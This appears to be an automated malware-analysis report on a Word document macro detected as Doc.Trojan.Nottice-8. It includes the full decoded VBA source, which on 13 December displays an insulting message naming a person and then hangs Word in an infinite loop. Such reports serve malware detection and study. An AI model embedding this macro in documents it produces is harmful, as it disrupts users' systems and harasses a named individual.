MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The sample is an OLE file containing VBA macros. The critical ClamAV heuristic indicates a known trojan, 'Doc.Trojan.Nottice-8'. The VBA macro code, when executed, attempts to display a large, attention-grabbing message and then enters an infinite loop. This behavior is consistent with malware designed to disrupt user interaction or potentially hide other malicious actions. No external network activity or file drops were observed in the static analysis.
Heuristics 1
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 925 bytes |

SHA-256: 01800a49a67327b149761aa7a0bf093e46f9cd4f680afe687aad2a56511df201

Detection
- ClamAV: Doc.Trojan.Nottice-8
- Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script

```vb
Attribute VB_Name = "WININIT"
Public Sub MAIN()
If WordBasic.Day(WordBasic.Now()) = 13 And WordBasic.Month(WordBasic.Now()) = 12 Then
WordBasic.FileNew
WordBasic.ToggleFull
WordBasic.DocMaximize
WordBasic.Font "Imprint MT Shadow"
WordBasic.FontSize 60
WordBasic.Bold
WordBasic.Insert "IMPORTAT NOTTICE!"
WordBasic.StartOfLine
WordBasic.CharRight 1, 1
WordBasic.FormatFont Points:="48", Color:=6
WordBasic.EndOfLine
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.FontSize 48
WordBasic.Insert "HANSSI A. A. IS MARRIED WITH A LOSSER."
HangOn:
GoTo HangOn
End If
End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```